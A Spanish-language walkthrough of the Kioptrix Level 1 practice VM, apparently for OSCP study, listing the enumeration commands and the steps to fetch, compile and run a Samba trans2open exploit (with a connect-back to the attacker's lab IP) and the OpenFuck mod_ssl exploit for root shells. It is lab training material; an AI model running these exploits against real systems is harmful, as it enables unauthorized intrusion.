Kioptrix Level 1 #1 Walkthrough

Comenzamos con una maquina virtual que tiene ya algún tiempo, pero sigue siendo muy recomendada para iniciar prácticas, sobre todo para los que buscan la certificación OSCP.


Descubrimos nuestro objetivo con netdiscover.

  • Se realiza el escaneo del objetivo, nos enfocamos en el puerto 139 para detectar la versión de SAMBA.

root@kali:~# nmap -sS -O -sV -v 192.168.56.18


Puerto: 139

Se intenta realizar la conexión a través del puerto 139 SMB:

root@kali:~# smbclient -L //192.168.56.18

  • Al solicitarnos el password lo primero que probamos es un simple enter sin password y nos muestra información sobre la versión de Samba.

root@kali:~# enum4linux -a 192.168.56.18

  • Con la versión de samba, buscamos el exploit apropiado.

Lo podemos descargar directamente en:

wget https://www.exploit-db.com/download/10


  • Se realiza la compilación:

root@kali:~# gcc 10.c -o 10

  • Se observa la info del exploit para armarlo correctamente:


  • Se ejecuta el exploit:

root@kali:~/Desktop# ./10 -b 0 -c 192.168.56.6 -C 40 192.168.56.18

ROOT


Puerto: 443

  • Se realiza el escaneo del objetivo, nos enfocamos en el puerto 443 para detectar la versión de SAMBA.

  • Investigamos segun la version, el exploit functional correspondiente:

  • Antes de armar el exploit, se debe actualizar agregando y modificando información según las instrucciones que aparecen en el mismo o en esta web: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
  • Después de agregar los headers, actualizar la URL e instalar las librerías en nuestro kali, observamos la info para armar el exploit correctamente:

  •  Se procede a compilar el exploit:

root@kali:~/Desktop# gcc -o OpenFuck 764.c -lcrypto


  • Ejecutamos el exploit y boooomm

root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.56.18 443 -c 40

ROOT

Comentarios